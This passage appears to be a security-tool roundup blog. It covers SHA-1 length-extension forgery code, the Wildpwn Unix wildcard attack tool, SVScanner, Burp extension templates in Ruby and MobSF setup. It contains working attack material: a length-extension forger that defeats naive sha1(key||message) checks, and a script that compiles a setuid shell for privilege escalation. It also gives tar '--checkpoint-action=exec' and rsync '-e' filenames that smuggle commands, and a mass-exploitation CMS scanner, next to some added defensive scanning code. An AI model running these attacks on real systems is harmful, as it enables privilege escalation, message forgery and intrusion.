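    """SHA-1 of data. Passing a recovered state and the byte count it covers resumes the hash."""
    msg = data + md_padding(already_absorbed + len(data))
    for off in range(0, len(msg), 64):
        state = _compress(state, msg[off:off + 64])
    return "".join(f"{v:08x}" for v in state)


def length_extend(hexdigest, original_data, data_to_add, key_length):
    """Same contract as hashpumpy.hashpump, SHA-1 only: returns (new hex digest, new message)."""
    glue = md_padding(key_length + len(original_data))       # the \x80\x00... bytes HashPump prints
    state = struct.unpack(">5I", bytes.fromhex(hexdigest))   # the digest IS the internal state
    absorbed = key_length + len(original_data) + len(glue)   # a whole number of 64-byte blocks
    return sha1_hex(data_to_add, state, absorbed), original_data + glue + data_to_add


def verify_naive(key, message, signature):
    """Vulnerable check: sha1(key || message), exactly what length extension forges."""
    return hmac.compare_digest(hashlib.sha1(key + message).hexdigest(), signature)


def verify_hmac(key, message, signature):
    """Hardened check: HMAC hashes the key a second time, so the digest never exposes a resumable state."""
    return hmac.compare_digest(hmac.new(key, message, hashlib.sha1).hexdigest(), signature)


def demo(key=b"s3cret-key-abc"):
    """Forge the page's waffle example against a constructed 14-byte key; returns (naive accepts, hmac accepts)."""
    known = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
    sig = hashlib.sha1(key + known).hexdigest()               # what the attacker observes
    new_sig, new_msg = length_extend(sig, known, b"&waffle=liege", len(key))
    return verify_naive(key, new_msg, new_sig), verify_hmac(key, new_msg, new_sig)
```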

Wildpwn – Tool Used For Unix Wildcard Attacks

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks. It’s considered a fairly old-skool attack vector, but it still works quite often.

Wildpwn Usage

It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

  • combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
  • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.


Example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash Scripts Used On tar/rsync Attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c
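The tar and rsync tricks above both rely on filenames that a privileged `cmd *` will expand into options, plus the dropper artefacts the clean-up lists remove. The code below is an added example, not part of wildpwn: it scans a directory for those conditions (option-like names, the .webscript/.syncscript/.cachefile.c artefacts and setuid files) and shows the defensive invocation, expanding names yourself behind `--` and with a `./` prefix. The ./pwn_me/ lookalike in `demo()` is constructed and no payload is executed.

```python
import os
import stat
import tempfile

# Artefacts left behind by the tar/rsync payload scripts shown above
DROPPER_ARTEFACTS = {".webscript", ".syncscript", ".cachefile.c"}


def scan_wildcard_dir(path):
    """Report what a privileged 'cmd *' run inside path would trip over."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(path):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, path)
            if name.startswith("-"):
                findings.append(f"option-like name: {rel!r}")
            if name in DROPPER_ARTEFACTS:
                findings.append(f"payload artefact: {rel}")
            if os.path.isfile(full) and not os.path.islink(full):
                st = os.stat(full)
                if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    findings.append(f"setuid/setgid file: {rel} (owner uid {st.st_uid})")
    return findings


def safe_argv(command, path):
    """Build argv for running inside path: '--' ends option parsing and './' makes every name a path."""
    names = sorted(os.listdir(path))
    return list(command) + ["--"] + [os.path.join(".", n) for n in names]


def demo():
    """Constructed ./pwn_me/ lookalike carrying the tar trick's filenames; returns (findings, argv)."""
    root = tempfile.mkdtemp(prefix="pwn_me-")
    for name in ("secret_file_1", "secret_file_2", "--checkpoint=1",
                 "--checkpoint-action=exec=sh .webscript", ".webscript"):
        with open(os.path.join(root, name), "w") as f:
            f.write("constructed\n")
    return scan_wildcard_dir(root), safe_argv(["tar", "cf", "backup.tar"], root)
```

`safe_argv` is what a backup cron job should build (with the working directory set to the target folder) instead of `tar cf backup.tar *`.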

Credit: Leon Juranic

BurpSuite Extension Ruby : Template to speed up building a Burp Extension using Ruby

Due to the lack of examples and implementations of Burp Suite extensions in Ruby, we have decided to make it easy for all rubyists to have a confident and quick start building useful extensions for the InfoSec community.

This repository is a collection of Burp Suite extension templates, focusing on Burp Suite API functionality and simplifying consumption of the Java API through JRuby.

Here, we’re trying to make it as simple as possible. You just focus on your idea and save tons of time searching for examples and extensions.

There are a couple of pieces of news here, one good and one bad:

The good news is that all written extensions, whether written in Java, Ruby or Python, are identically useful resources to you.

The bad news is that you have to read and understand a bit of Java. And that’s the key to the good news though 😉

Note: Some extensions have been supported with animated screenshots for clarity before use.


BurpSuite Extension Ruby

Burp GUI

Extension                    Description
send_alert_pure.rb           Pure implementation of sending messages to the Alerts tab
popup_msg_pure.rb            Pure implementation of popping up a GUI message box
suite_itab_pure.rb           Pure implementation of a Suite Tab (ITab)
editor_tab_pure.rb           Pure implementation of an editor tab (beside the request & response tabs)
context_menu_pure.rb         Pure implementation of a context menu (right-click menu)
suite_itab_subtab.rb         Pure implementation of a Suite Tab with sub-tabs (sub-panels)
suite_itab_subtab_icon.rb    Pure implementation of a Suite Tab with sub-tabs (sub-panels) and icons
context_menu_pure.rb         Pure implementation of custom menus and sub-menus with some actions
tab_tree.rb                  Implementation of a tab containing a tree of items

Resources

  • Customizing Burp Suite – Getting the Most out of Burp Extensions
  • Google dork: burp extension site:github.com

SVScanner – Scanner Vulnerability And MaSsive Exploit

SVScanner is a tool for vulnerability scanning and mass exploitation. It targets several open source CMSs.

Requirements

  • PHP 7 or later
  • PHP modules php-cli and php-curl (on Linux)


SVScanner Installation

Linux

git clone https://github.com/radenvodka/SVScanner.git
cd SVScanner
php svscanner.php

Windows

Download XAMPP (PHP 7).
Download SVScanner: https://github.com/radenvodka/SVScanner/releases
Then open cmd and run php svscanner.php.

Disclaimer

Modifications and changes to this code are accepted; however, every public release that uses this code must be approved by the author of this tool.

Credit: Eka Syahwan

MobSF – Mobile Security Framework Is An Automated All-In-One Mobile Application

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and supports both binaries (APK, IPA & APPX) and zipped source code. It can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz.

Static Analyzer Docker Image

An automated, prebuilt Docker image of the MobSF Static Analyzer is available from Docker Hub:

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest


Requirements

Static Analysis

  • Python 3.6+
  • Oracle JDK 1.7 or above
  • Mac OS Users must install Command-line tools
  • iOS IPA Analysis works only on Mac and Linux.
  • Windows App Static analysis requires a Windows Host or Windows VM for Mac and Linux.

NOTE:

  • On Linux and Mac, install Oracle Java 1.7 or above and make it the default one.
  • On Linux, make sure you have 32 bit execution support enabled.

Dynamic Analysis

  • If you are going to use the MobSF x86 Android VM, it requires Oracle VirtualBox (VirtualBox download).
  • If you are going to use the MobSF Android AVD (ARM emulator), it requires Android Studio and a configured AVD.
  • Hardware requirements: min 4GB RAM, 5GB HDD/SSD and virtualization support for running the MobSF VM, and Intel HAXM if you are running the MobSF ARM emulator.

Installation

Tested on Windows (7, 8, 8.1, 10), Kali (2016.2), Ubuntu (14.04, 16.04), OS X (Mavericks, Yosemite, El Capitan) and macOS (Sierra, High Sierra).

Configuring Static Analyzer

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
pip3 install virtualenv
virtualenv -p python3 venv
source venv/bin/activate
pip3 install -r requirements.txt

PDF Report Generation

  • You need to install wkhtmltopdf binary separately for generating PDF reports.
  • Check wkhtmltopdf downloads and Installing wkhtmltopdf wiki for more information.
  • In Windows, you need to add the folder that contains wkhtmltopdf binary to environment variable PATH.

Running

python3 manage.py runserver

If you need to run on a specific port number try python3 manage.py runserver PORT_NO. To expose MobSF to a particular IP, you can try python3 manage.py runserver IP:PORT_NO.

If everything goes right, you will get an output like the one below.

You can navigate to http://localhost:8000/ to access the MobSF Web interface.

Configuring Dynamic Analyzer with MobSF Android 4.4.2 x86 VirtualBox VM

The Dynamic Analyzer is available only for Android binaries (APK) and works only if your computer has at least 4GB of RAM and full virtualization support.

NOTE: If you are configuring MobSF VM in VirtualBox for Dynamic Analysis, you must have configured MobSF in the host OS and not inside any VM.

To Configure Dynamic Analyzer we need 4 things.

  • VM UUID
  • Snapshot UUID
  • Host/Proxy IP
  • VM/Device IP

Steps to Follow

  • Open VirtualBox, go to File -> Import Appliance and select the MobSF_VM_X.X.ova file.
  • Proceed with the import process. Do not alter anything.
  • Once the OVA is imported successfully, you will see a new entry in VirtualBox named MobSF_VM_X.X.
  • Right-click the MobSF VM and choose Settings, then go to the Network tab. Here we need to configure two network adapters.
    • Adapter 1 should be enabled and attached to Host-only Adapter. Remember the name of the adapter; we need it to identify the Host/Proxy IP.
    • Adapter 2 should be enabled and attached to NAT.
  • Save the settings and start the MobSF VM. While the VM is booting up, note down the VM IP.
  • Once the VM boots up, it will present a lock screen. The password for the lock screen is 1234.

NOTE: If the VM does not boot up properly then you cannot perform Dynamic Analysis with MobSF VM.

  • Getting the Host/Proxy IP
    • Windows: issue the command ipconfig in a command prompt and note down the IP corresponding to the name of the Host-only Adapter.
    • Unix: issue the command ifconfig in a terminal and note down the IP corresponding to the name of the Host-only Adapter.

NOTE: The VirtualBox Host-Only Adapter IP and MobSF VM IP should be in the same network range. If your MobSF VM IP and Adapter IP are in different network range, modify the Adapter IP to be in the same network range as that of MobSF VM IP.

  • Go to Wi-Fi Settings in the MobSF VM and set the proxy IP to the Host/Proxy IP obtained in the previous step and the port number to 1337.
  • Save the settings and navigate to the home screen of the MobSF VM. Wait for 30 seconds and save a snapshot of the MobSF VM in VirtualBox.
  • Once the snapshot is saved, right-click the MobSF VM and select Show in Explorer or Show in Finder.
  • Open the file MobSF_VM_X.X.vbox in any text editor and note down the VM UUID and Snapshot UUID.

Here the value of uuid is the VM UUID and currentSnapshot is the Snapshot UUID.

  • Now we have all the things needed to configure the Dynamic Analyzer (Host/Proxy IP, VM IP, VM UUID and Snapshot UUID)
  • Go to MobSF/settings.py and set the appropriate values as
    • UUID = VM UUID
    • SUUID = Snapshot UUID
    • VM_IP = VM IP
    • PROXY_IP = Host/Proxy IP
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_VM" (default)
  • This will configure MobSF to use Android VirtualBox VM for Dynamic Analysis.
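As an added example (not MobSF project code), the last steps above done in Python: it reads uuid and currentSnapshot from the Machine element of a .vbox file, checks the VM IP and Host-only adapter IP against the same-network-range requirement in the NOTE above, and renders the settings.py lines. The .vbox content and GUIDs are a constructed sample; stripping the braces from the GUIDs and using a /24 range are assumptions, and the function names are my own.

```python
"""Added example (not MobSF code): extract VM/snapshot UUIDs from a .vbox
file and sanity-check the IPs before writing MobSF/settings.py values."""
import ipaddress
import xml.etree.ElementTree as ET

VBOX_NS = "{http://www.virtualbox.org/}"

# Constructed sample of the relevant part of a .vbox file; the GUIDs are placeholders.
SAMPLE_VBOX = """<?xml version="1.0"?>
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.16-linux">
  <Machine uuid="{11111111-2222-3333-4444-555555555555}" name="MobSF_VM_X.X"
           OSType="Linux26" currentSnapshot="{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"
           snapshotFolder="Snapshots"/>
</VirtualBox>
"""


def read_vbox_ids(xml_text):
    """Return (vm_uuid, snapshot_uuid) from the <Machine> element.
    Assumption: settings.py takes the bare GUID, so the braces are stripped."""
    machine = ET.fromstring(xml_text).find(VBOX_NS + "Machine")
    if machine is None:
        raise ValueError("no <Machine> element: not a VirtualBox .vbox file")
    vm_uuid = machine.get("uuid", "").strip("{}")
    snapshot_uuid = machine.get("currentSnapshot", "").strip("{}")
    if not vm_uuid or not snapshot_uuid:
        raise ValueError("currentSnapshot missing: save a snapshot of the VM first")
    return vm_uuid, snapshot_uuid


def same_network(vm_ip, proxy_ip, prefix=24):
    """True when both addresses fall in the same /prefix network; the NOTE above
    requires the VM IP and Host-only Adapter IP to share a range (/24 assumed)."""
    net = ipaddress.ip_network(f"{proxy_ip}/{prefix}", strict=False)
    return ipaddress.ip_address(vm_ip) in net


def render_settings(vm_uuid, snapshot_uuid, vm_ip, proxy_ip):
    """Produce the MobSF/settings.py lines; refuse IPs in different ranges."""
    if not same_network(vm_ip, proxy_ip):
        raise ValueError(f"{vm_ip} and {proxy_ip} are not in the same network range")
    return "\n".join([
        f"UUID = '{vm_uuid}'",
        f"SUUID = '{snapshot_uuid}'",
        f"VM_IP = '{vm_ip}'",
        f"PROXY_IP = '{proxy_ip}'",
        'ANDROID_DYNAMIC_ANALYZER = "MobSF_VM"',
    ])
```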

Configuring Dynamic Analyzer with MobSF Android 4.1.2 arm Emulator

  • Make sure Android Studio is installed and an AVD is created. (Nexus 5 with Lollipop image is recommended)
  • Extract MobSF_ARM_Emulator.zip
  • Run scripts/mobsfy_AVD.py script and specify the directory that contains the files extracted from MobSF_ARM_Emulator.zip.
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_AVD"
  • This will configure MobSF to use Android arm Emulator for Dynamic Analysis.

Manual Configuration (not recommended)

  • If mobsfy_AVD.py script is not running successfully, you need to set the values for AVD_EMULATOR and AVD_PATH in MobSF/settings.py manually.
  • Follow the README inside the emulator zip and change all the path fields according to your system
  • Edit MobSF/settings.py and modify:

AVD_EMULATOR = r'/Users/[USERNAME]/Library/Android/sdk/tools/emulator'
# This can be /Users/[USERNAME]/Library/Android/Sdk/emulator/emulator for newer versions of the Android SDK

AVD_PATH = r'/Users/[USERNAME]/.android/avd'
# Path to the avd folder where you extracted the emulator
  • In MobSF/settings.py, set ANDROID_DYNAMIC_ANALYZER = "MobSF_AVD"

Configuring Dynamic Analyzer with Rooted Android 4.03 – 4.4 Device

Configuring Dynamic Analyzer with Rooted Android 4.03 – 4.4 VM

  • MobSFy the Custom VM, Follow the instructions here: Configure MobSF Dynamic Analysis Environment in Custom VM
  • VM on Virtual Box: If the VM is hosted on VirtualBox, follow the same steps that you have followed for configuring MobSF x86 VirtualBox VM and set appropriate VM UUID, Snapshot UUID, Host/Proxy IP, VM IP and set ANDROID_DYNAMIC_ANALYZER = "MobSF_VM"
  • Any other VM: configure it as a real device. Set ANDROID_DYNAMIC_ANALYZER = "MobSF_REAL_DEVICE" and specify DEVICE_IP and DEVICE_ADB_PORT. The snapshot feature is only available with VMs hosted in VirtualBox.

Updating MobSF

If you are updating MobSF, in most cases you will have to perform database migrations, or you will see errors such as

[ERROR] Saving to DB (E:\Mobile-Security-Framework-MobSF\StaticAnalyzer\views\android\db_interaction.py, LINE 236 "static_db.save()"): table StaticAnalyzer_staticanalyzerandroid has no column named 

Run the below command to migrate your db

python3 manage.py makemigrations
python3 manage.py migrate

If the above changes didn't work, you might have to run clean.sh (present in scripts) on Mac/Linux. After that, run the above commands.

NOTE: This will remove the previously saved scan results.

Disabled Components

Some components are disabled by default because they are experimental.

APKiD

APKiD is disabled by default. Before enabling you will have to install the rednaga fork of yara-python.

git clone --recursive https://github.com/rednaga/yara-python-1 yara-python
cd yara-python
python3 setup.py build --enable-dex install

Enable APKiD in settings.py by setting APKID_ENABLED to True.

Running Tests

  • Basic Static Analyzer unit tests – run MobSF and navigate to http://127.0.0.1:8000/runtest/
  • MobSF REST API unit tests – run MobSF and navigate to http://127.0.0.1:8000/runapitest/

Screenshots

Static Analysis – Android APK

Static Analysis – iOS IPA

Static Analysis – Windows APPX

Dynamic Analysis – Android APK

Web API Fuzzer

Video Presentation